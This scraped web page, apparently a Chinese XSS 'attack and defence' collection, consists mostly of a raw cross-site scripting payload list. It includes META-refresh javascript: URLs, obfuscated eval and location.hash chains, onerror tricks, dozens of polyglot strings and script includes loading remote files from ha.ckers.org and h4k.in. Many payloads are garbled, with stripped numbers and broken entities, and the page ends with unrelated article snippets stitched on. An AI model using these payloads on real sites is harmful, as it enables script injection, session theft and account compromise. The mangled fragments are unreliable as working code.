%%);x=alert;x(%% /finally through!/.source %%);//

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<A HREF="http://6	6.000146.0x7.147/">XSS</A>

<IMG SRC="mocha:[code]">

style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="

sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="

: _

=

eval

b=

__

=

location

c=

_

(

__

.

hash

//

.

substr

()

)

<SCRIPT SRC=http://ha.ckers.org/xss.js<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")>

</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>

Exploit String: perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out

perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out

<body onload=;;;;;;;;;;;_=alert;_();;;;

s1=?'':'i';s2=?'':'fr';s3=?'':'ame';i1=s1+s2+s3;s1=?'':'jav';s2=

?'':'ascr';s3=?'':'ipt';s4=?'':':';s5=?'':'ale';s6=?'':'rt';s7=

?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa

rentNode;x.appendChild(i);

<body <body onload=;;;;;al:eval('al'+'ert(1)');;><IMGSRC=&#;&#;&#;&#;&<WBR>#;&#;&#;&#;&#;&<WBR>#;&#;&#;

&#;&#;&<WBR>#;&#;&#;&#;&#;&#<WBR>;&#;&#;&#><IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28

&<WBR>#x27&#x58&#x53&#x53&#x27&#x29><IMGSRC=&#&#&<WBR>#&#&#&<WBR>#&#&#&<WBR>#&#&#

&<WBR>#&#&#&<WBR>#&#&#&<WBR>#&#&#&<WBR>#&#&#>>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;

alert(%26quot;%%23x20;XSS%%23x20;Test%%23x20;Successful%26quot;)>(?(?{a:?""[?"ev\a\l":](?"\a\lert":):}:).a:)[?"\c\a\l\l":](content,?"x\s\s":)<body/s/onload=x={doc:parent.document};x.doc.writeln()<body/””$/onload=x={doc:parent[’document’]};x.doc.writeln()

[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>()</_>);

s1=<s>evalalerta()a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[]:

,e2=/s/!=/s/?s3[]:,e3=/s/!=/s/?s3[]:,e4=/s/!=/s/?s3[]:,e=/s/!=/

s/?[e1+e2+e3+e4]:,a1=/s/!=/s/?s3[]:,a2=/s/!=/s/?s3[]:,a3=/s/!=/

s/?s3[]:,a4=/s/!=/s/?s3[]:,a5=/s/!=/s/?s3[]:,a6=/s/!=/s/?s3[]:

,a7=/s/!=/s/?s3[]:,a8=/s/!=/s/?s3[]:

,a=a1+a2+a3+a4+a5+a6+a7+a8,,e(a)

o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>()</



s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)

'+'';

u1=s1+s2+s3;URL=u1

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><A HREF="http://google.com/">XSS</A><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210

<SCRIPT>alert('XSS')</SCRIPT><SCRIPT>alert(String.fromCharCode(,,))</SCRIPT><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Exploit String: a=||'ev'+'al',b=||location.hash,c=||'sub'+'str',[a](b[c]())

a=||'ev'+'al'||;b=||'locatio';b+=||'n.h'+'ash.sub'||;b+=||'str(1)';c=b[a];c(c(b))

eval.call(this,unescape.call(this,location))

d=||'une'+'scape'||;a=||'ev'+'al'||;b=||'locatio';b+=||'n'||;c=b[a];d=c(d);c(d(c(b)))

l=  || 'str',m=  || 'sub',x=  || 'al',y=  || 'ev',g=  || 'tion.h',f=  || 'ash',k=  || 'loca',d= (k) + (g) + (f),a

_=eval,__=unescape,___=document.URL,_(__(___))

$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)

$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))

evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;[evil](changeProto);hsh=[evil](hshCod),cod=hsh.ss();[evil](cod)

with(location)with(hash)eval(substring())<IMG SRC=" &#14;  javascript:alert('XSS');">

Exploit String: <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--><STYLE TYPE="text/javascript">alert('XSS');</STYLE><style>

body:after{

content: “\\6c\\\\\\″

}

</style>

<script>

eval(eval(document.styleSheets[].cssRules[].style.content))

</script>

Exploit String: <XSS STYLE="xss:expression(alert('XSS'))"><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><LINK REL="stylesheet" HREF="javascript:alert('XSS');">

}</style><script>a=eval;b=alert;a(b(/i/.source));</script>a=alert

A=alert;A()<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>

Exploit String: <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE></textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'

Exploit String: http://aa"><script>alert(123)</script>http://aa'><script>alert(123)</script>>%%><img%20src%3d%22javascript:alert(%%20XSS%)%><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

http://aa<script>alert(123)</script>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<IMG SRC=&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;>

with(document.__parent__)alert()

Exploit String: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

Exploit String: <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML><HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML><iframe%20src="javascript:alert(1)<a%20href="javascript:alert(1);<animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>

<script>onerror=alert;throw </script>

<script>{onerror=alert}throw </script>

<script>throw onerror=alert,'some string',,'haha'</script>

<script>{onerror=eval}throw'=alert\x281337\x29'</script>

<script>{onerror=eval}throw{lineNumber:,columnNumber:,fileName:,message:'alert\x281\x29'}</script>

<script>{onerror=prompt}throw{lineNumber:,columnNumber:,fileName:'second argument',message:'first argument'}</script>

<script>throw/a/,Uncaught=,g=alert,a=URL+,onerror=eval,//g+a[]+[]+a[]</script>

<script>TypeError.prototype.name ='=/',[onerror=eval]['/-alert(1)//']</script>

Javascript开头

 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>

 javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>

 javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>

 javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`

 javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

 javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>

 javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>

 javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>`

 javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>`

 javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg"///*/ onload=alert()//</script>

 javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script>

 javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=alert()//</script>

 javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=alert()//</script>

 javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script>

 javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script>

 javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>--><<script>alert()<</script><frame/*/ onload=alert()//>

 javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//<svg <frame */onload= alert()//</script>

 javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()--><<svg/*/ onload=alert()//>

 javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``>

 javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]<<script>///<frame */ onload=alert()//<</script>

 javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()><<svg/onload= /**/alert()//>

 javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script><<script> /**/alert()//<</script><frame onload=alert()>

 javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script>

 javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script><svg/<frame/onload=alert()>

 javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``><<svg/onload=alert()>

 javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=alert()><svg/\"/*<svg onload=' /**/-alert()//'>javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script><<svg/onload= alert()//>

 javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script>

 javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script><<svg onload=alert()>

 javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()>

 javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script --><<script>alert()<</script>\ /**/alert()//

 javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert()><frame/src=javascript:alert()>

 javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script>

 javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg <svg onload=alert()> alert()//

 javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert()><script>alert()</script>

 javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert()><frame src=javascript:alert()>

 javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="<svg/onload=alert()>"><frame/onload=alert()>*/ alert()//

 javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*<svg onload=alert()>*/ alert()//</script>

 jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//<svg/onload=alert()><frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//>

 javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>--><<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()>

 javascript:alert()//\ /*<svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload=";alert();"></script>--><script>alert`;alert();`</script>*/alert()//\";alert()//

 javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//--></template><frame/onload=alert() <img src=x onerror=alert()></style/</title/</textarea/</noscript/</noembed/</script><script>alert()</script>

 javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert()//'-->\" alert();/*`/**/(/**/alert())//<script>alert()</script><<svg onload=alert()>>

 javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()><svg/onload=alert(1)> alert()//

 javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert();"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()><svg/onload=alert()> alert(1)//

 javascript:alert()//<frame/src=javascript:alert()><svg/onload=alert()>`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert()>*/ alert()//*

 javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\";alert()//";alert()//';alert()//<script>alert()</script><frame src="javascript:alert()">` alert()//<svg/onload=alert()>*/alert()/*

 javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--

 javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+alert()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+alert()//'>"><script>alert()</script><frame src="javascript:alert()"></frameset>+\"; alert()//<img src onerror=alert()>

 javascript:alert()//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)//

x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';

应用安全-Web安全-XSS(跨站攻击)攻防整理的更多相关文章

XSS跨站攻击
目录 1 XSS跨站攻击简介 1 1.1 什么是XSS 1 1.2 XSS的分类 1 1.3 XSS的危害 1 2 XSS的攻击原理 1 2.1 本地式漏洞攻击 1 2.2 存储式漏洞攻击 2 2.3 ...
用shell脚本批量进行xss跨站攻击请求
由于执行的xss攻击请求他多了,初步估计要执行83次,而且还要执行3篇,如果手工一个一个去执行,说出去,我还配叫自动化大师吗: 有鉴于此,边打算自己编写一个脚本进行批量执行: 而短脚本的编写,非she ...
云锁Linux服务器安全软件安装及防护webshell、CC、XSS跨站攻击设置
无论我们在使用电脑,还是使用VPS/服务器的时候,最为担心的就是服务器是否有安全问题,尤其是网站服务器再遭受攻击的时候如何得到防护.对于大部分站长用户来说,我们可能只会使用基础的环境,如果真遇到问题 ...
Laravel5中防止XSS跨站攻击的方法
本文实例讲述了Laravel5中防止XSS跨站攻击的方法.分享给大家供大家参考,具体如下: Laravel 5本身没有这个能力来防止xss跨站攻击了,但是这它可以使用Purifier 扩展包集成 HT ...
web安全性测试——XSS跨站攻击
1.跨站攻击含义 XSS:(Cross-site scripting)全称"跨站脚本",是注入攻击的一种.其特点是不对服务器端造成任何伤害,而是通过一些正常的站内交互途径,例如发布 ...
Cross-Site Scripting XSS 跨站攻击全攻略分类：系统架构 2015-07-08 12&colon;25 21人阅读评论(2) 收藏
原文:http://a1pass.blog.163.com/blog/static/2971373220087295449497/ 题记:这是我在<黑客X档案>08年第5期发表的一篇文章, ...
XSS跨站攻击靶场-通关笔记
XSS攻击是Web攻击中最常见的攻击手法之一,XSS中文名跨站脚本攻击,该攻击是指攻击者在网页中嵌入恶意的客户端脚本,通常是使用JS编写的恶意代码,当正常用户访问被嵌入代码的页面时,恶意代码将会在用户 ...
xss跨站攻击原理
https://www.cnblogs.com/frankltf/p/8975010.html 跨站脚本攻击:通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,一旦攻击成功,它可以获取用户 ...
宽字节XSS跨站攻击
简介宽字节跨站漏洞多发生在GB系统编码. 对于GBK编码,字符是由两个字节构成,在%df遇到%5c时,由于%df的ascii大于128,所以会自动拼接%5c,吃掉反斜线.而%27 %20小于asci ...

随机推荐

iOS摇一摇手机，播放微信摇一摇音效
实现微信摇一摇播放音效,代码如下:- (void)motionBegan:(UIEventSubtype)motion withEvent:(UIEvent *)event{ if (motio ...
Python之路【第八篇】python实现线程池
线程池概念什么是线程池?诸如web服务器.数据库服务器.文件服务器和邮件服务器等许多服务器应用都面向处理来自某些远程来源的大量短小的任务.构建服务器应用程序的一个过于简单的模型是:每当一个请求到达就 ...
UIAlertController 的使用
IAlertController 同时替代了 UIAlertView 和 UIActionSheet,从系统层级上统一了 alert 的概念 —— 即以 modal 方式或 popover 方式展示. ...
kuangbin&lowbar;ShortPath S (POJ 3169)
被cow类题目弄得有些炸裂想了好久好久写了120多行依然长跪不起发现计算约束条件的时候还是好多麻烦的地方过不去然后看了看kuangbin的blog 都是泪啊差分约束的方式做起来只要70多行啊炒 ...
Excel在任务栏中只显示一个窗口的解决办法
Excel在任务栏中只显示一个窗口的解决办法以前朋友遇到过这个问题,这次自己又遇到了,习惯了以前的那种在任务栏中显示全部窗口,方便用Alt+Tab键进行切换．如果同时打开许多Excel工作簿, ...
官方解答：Vultr VPS常见问题
VULTR VPS配置高,价格低廉,是非常优秀的vps品牌.今天我来翻译vultr官方FAQ,相信你能找到具体答案. Q 请介绍VULTR VPS机器硬件配置 Intel CPU 3+ GHz Cor ...
spark对elasticsearch增删查改
增新建一个 dataframe ,插入到索引 _index/_type ,直接调用 saveToEs ,让 _id 为自己设定的 id: import org.elasticsearch.spark ...
ElasticSearch6&period;5&period;0 【script&lowbar;lang not supported】
执行代码:[就是想根据条件更新]把品牌为LiNing的都改成Cat. UpdateByQueryRequestBuilder updateByQuery = UpdateByQueryAction.I ...
洛谷P4841 城市规划 [生成函数，NTT]
传送门题意简述:求\(n\)个点的简单无向连通图的数量\(\mod \;1004535809\),\(n \leq 130000\) 经典好题呀!这里介绍两种做法:多项式求逆.多项式求对数先 ...
扩展HtmlHelper类实现Mvc4分页
1.扩展HtmlHelper类方法Pager public static HtmlString Pager(this HtmlHelper htmlHelper, int currentPage, i ...